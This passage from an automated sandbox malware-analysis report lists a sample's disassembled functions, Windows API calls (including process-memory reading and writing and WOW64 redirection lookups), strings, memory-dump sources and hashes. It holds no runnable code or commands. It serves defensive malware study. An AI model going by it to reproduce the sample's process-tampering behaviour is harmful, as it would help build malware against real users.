                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: 93b4d801d1dc06f9b6becb475238ba249b319396d19d66087b29fae28ee2b97a
                                              • Instruction ID: fd0360bbbee5be70269d3596c056737d5a8bb69f0290ca8282b5ae65440f30a3
                                              • Opcode Fuzzy Hash: 93b4d801d1dc06f9b6becb475238ba249b319396d19d66087b29fae28ee2b97a
                                              • Instruction Fuzzy Hash: 4DA13B71504205AFD300EF64DC81EABB7E8EF95718F1049ACF155972A2EB70EE49CB92
                                              Function 00B3E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B41680: _memmove.LIBCMT ref: 00B416DB
                                              • __swprintf.LIBCMT ref: 00B3E598
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B3E431
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: 2d3e7eab5811d151f70df54333fd20f2c954fbb0f4e5d48c01421161ac840d1e
                                              • Instruction ID: 3e60d773292845e35746e17270c670c98cd62ef0315302b67b988ca82e822347
                                              • Opcode Fuzzy Hash: 2d3e7eab5811d151f70df54333fd20f2c954fbb0f4e5d48c01421161ac840d1e
                                              • Instruction Fuzzy Hash: 44919F715083019FC724EF28C885D6EB7E8EF95700F11499EF896972A1EB70EE44DB52
                                              Function 00B5523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00B552CD
                                                • Part of subcall function 00B60320: __87except.LIBCMT ref: 00B6035B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 2968d3799c02e5c76d087b9ac74186965eda7bcd6c8dc42b52c829697836ed04
                                              • Instruction ID: 375d20a16a18864dee2c9f14c98b83839ac4ed5da3811f396d01f72addb45637
                                              • Opcode Fuzzy Hash: 2968d3799c02e5c76d087b9ac74186965eda7bcd6c8dc42b52c829697836ed04
                                              • Instruction Fuzzy Hash: AB516D6192960587CB317716C9A137B2BE4DB00753F2049D8E9C6473A9EF7D8CC8DB46
                                              Function 00B50654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: 08d6c48a056a54e605bbe7af3220791c02336e0aa7777b0712532047657875d6
                                              • Instruction ID: 9bd3f562d754735b6d9b17e34517976dc25f499eeda4d8500c945d4c30e17a38
                                              • Opcode Fuzzy Hash: 08d6c48a056a54e605bbe7af3220791c02336e0aa7777b0712532047657875d6
                                              • Instruction Fuzzy Hash: D251F275900256CFDB25FF68C880AFA7BE4EF59310F1440D6EC95AB2A0D734AD86CB61
                                              Function 00B4CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: ef5e5fb22caccd4e35ed3cbeb8d0d87810211f35218ae18fa2ccb742b3873006
                                              • Instruction ID: 1df856fc6be60797288cbd5e49c1e399433a51fdb7bdc52e612897f01bf51a79
                                              • Opcode Fuzzy Hash: ef5e5fb22caccd4e35ed3cbeb8d0d87810211f35218ae18fa2ccb742b3873006
                                              • Instruction Fuzzy Hash: 8A51D4719013099BCB24DF65C8917AABBF8EF04314F1485EEE88ADB251E730D686CB40
                                              Function 00B8A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B91CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B89E4E,?,?,00000034,00000800,?,00000034), ref: 00B91CE5
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B8A3F7
                                                • Part of subcall function 00B91C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B89E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00B91CB0
                                                • Part of subcall function 00B91BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00B91C08
                                                • Part of subcall function 00B91BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B89E12,00000034,?,?,00001004,00000000,00000000), ref: 00B91C18
                                                • Part of subcall function 00B91BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B89E12,00000034,?,?,00001004,00000000,00000000), ref: 00B91C2E
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B8A464
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B8A4B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: ac650012c4245bcac8e915e54073761b38da75e85f311ba079a12505f27c6dc5
                                              • Instruction ID: 360eae0c9bcfc51ae819631e3c997e4574e21f3910d80879a4246224569892c6
                                              • Opcode Fuzzy Hash: ac650012c4245bcac8e915e54073761b38da75e85f311ba079a12505f27c6dc5
                                              • Instruction Fuzzy Hash: B7416C7294121DBFDF10EFA4CC85ADEB7B8EB09300F0440A5FA45B7290DA706E85DBA1
                                              Function 00BB79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BB7A86
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BB7A9A
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB7ABE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: 3a4aaa7340a582610912ec48785a7309a7e16483cbc1a7b63d35eabe19241ac7
                                              • Instruction ID: 54e26a9e01926234160d522646e76e15e6a0a56c5f5cdd68d4d24ea86d9a055f
                                              • Opcode Fuzzy Hash: 3a4aaa7340a582610912ec48785a7309a7e16483cbc1a7b63d35eabe19241ac7
                                              • Instruction Fuzzy Hash: 43219F32654218ABDF259F54CC82FEE3BA9EB88724F110254FE156B190DAB1AC51CBA0
                                              Function 00BB81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BB826F
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BB827D
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BB8284
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 40f75abaa956dd820495d05eece348a9fb84b0d9ede23052d16d5efb002178d6
                                              • Instruction ID: eebb1f0367dabc386a0773d2f2a44c09d41bcd9cffe3a18a229f496af94c50fc
                                              • Opcode Fuzzy Hash: 40f75abaa956dd820495d05eece348a9fb84b0d9ede23052d16d5efb002178d6
                                              • Instruction Fuzzy Hash: 0C2139B5604209AFDB10DF58DC85DB637EDEF5A3A4B140199FA019B2A1CFB1EC51CBA0
                                              Function 00BB72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BB7360
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BB7370
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BB7395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 4f52670f44e28e7c544086c861158f6389077b2ddc82c188711a0ab1789582e8
                                              • Instruction ID: 5ec8d7df1d108dd9a9a159c5a2e3f1193e3bc6adf82e1371ce76c3f37b25db0c
                                              • Opcode Fuzzy Hash: 4f52670f44e28e7c544086c861158f6389077b2ddc82c188711a0ab1789582e8
                                              • Instruction Fuzzy Hash: C821C232654118BFDF158F54CC85FFF3BEAEB89754F118164F9009B190CAB1AC529BA0
                                              Function 00BB7D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BB7D97
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BB7DAC
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BB7DB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: 4840eea8ff13284b1411bdf2a49fa2ee3707717ea71be261e91f87450f9473a4
                                              • Instruction ID: 115bf3ebca32cfc6faf7263936a111c58c8b13db216f87a14b9a28056dee57ca
                                              • Opcode Fuzzy Hash: 4840eea8ff13284b1411bdf2a49fa2ee3707717ea71be261e91f87450f9473a4
                                              • Instruction Fuzzy Hash: 4911C472244208BFDF109F64CC45FFB7BE9EFC8B54F114168FA41A6090DAB19811CB20
                                              Function 00BAC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7027A,?), ref: 00BAC6E7
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BAC6F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: 6721381b2fbaea8122e5bc5ed44791c1098ffad3278cf610d8057d47858f82ff
                                              • Instruction ID: d6b1680df7344c0f35c4b8246b91797ea838b699dccbfe469c7484076c6ee77e
                                              • Opcode Fuzzy Hash: 6721381b2fbaea8122e5bc5ed44791c1098ffad3278cf610d8057d47858f82ff
                                              • Instruction Fuzzy Hash: CDE0C239224302DFD7206B29CC48F42BAE4FF09314F4084ADE895D3220DB70CC808F10
                                              Function 00B44BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B44AF7,?), ref: 00B44BB8
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B44BCA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: 6fe78b7b9aa210c1a7baca3ea37b4153b260193709ab08280c3f8a311d115b24
                                              • Instruction ID: fd706848889190c7f637c543e40433d3bcdc5f0f8cc19a12e10aa1a3ba2690e9
                                              • Opcode Fuzzy Hash: 6fe78b7b9aa210c1a7baca3ea37b4153b260193709ab08280c3f8a311d115b24
                                              • Instruction Fuzzy Hash: 92D017B0560712CFD720AF35EC08B06B6E5EF08351F159CAEE496E2564EFB4D990DA50
                                              Function 00B44B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B44B44,?,00B449D4,?,?,00B427AF,?,00000001), ref: 00B44B85
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B44B97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: f47ac80b5e2be267e06253fe55fb2dc36d213798d70a3afd132de6c4e547e581
                                              • Instruction ID: 8adf2169ed5438bfaf889964123712fadc5cb07e4a1cef84628286a91ca18b9f
                                              • Opcode Fuzzy Hash: f47ac80b5e2be267e06253fe55fb2dc36d213798d70a3afd132de6c4e547e581
                                              • Instruction Fuzzy Hash: BBD01770520B52CFD720AF35EC18F06B6E4EF08351F1588AEE496F2560EBB0E880DA50
                                              Function 00BB1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00BB1696), ref: 00BB1455
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BB1467
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: f880d29dae06b581eae74b028fead198d92785be79e74846000dc4760680baf0
                                              • Instruction ID: 2f6ac5414beb23bf179577e6f29a94ca7c7b68fea81e966d389480cb149e7782
                                              • Opcode Fuzzy Hash: f880d29dae06b581eae74b028fead198d92785be79e74846000dc4760680baf0
                                              • Instruction Fuzzy Hash: F9D01230510712CFD7205F75C809656B6D4AF06395F15CC6AA4D6E3260DBB0D8C0CA10
                                              Function 00B455F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00B45E3D), ref: 00B455FE
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B45610
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: af1d6ce811226b404a0a01177dba750d1983c66f0d50765d147a060ca351eca7
                                              • Instruction ID: b87bb74bf35cc30fb9b3a959ae31196235f71c1fcd43dbb5b7722fcb6fcf2a75
                                              • Opcode Fuzzy Hash: af1d6ce811226b404a0a01177dba750d1983c66f0d50765d147a060ca351eca7
                                              • Instruction Fuzzy Hash: FED01274530B12CFD7306F35C808B16B6D4AF04355F15886DE4D5D2161DAB0C480D650
                                              Function 00BA97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BA93DE,?,00BC0980), ref: 00BA97D8
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BA97EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: 54b02f6f66dbba619c83c1ea21d8d6b57137078084e599d12131c6f6e827dbb5
                                              • Instruction ID: 39f3a57e7ef35cd8627b08462eb6846c78a02f5234527ab4a9051b595f4f6bf7
                                              • Opcode Fuzzy Hash: 54b02f6f66dbba619c83c1ea21d8d6b57137078084e599d12131c6f6e827dbb5
                                              • Instruction Fuzzy Hash: 91D01770524713CFD720AF75D888B06B6E4EF09391F1588AEE496E2260EFB0C880DA21
                                              Function 00B87D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
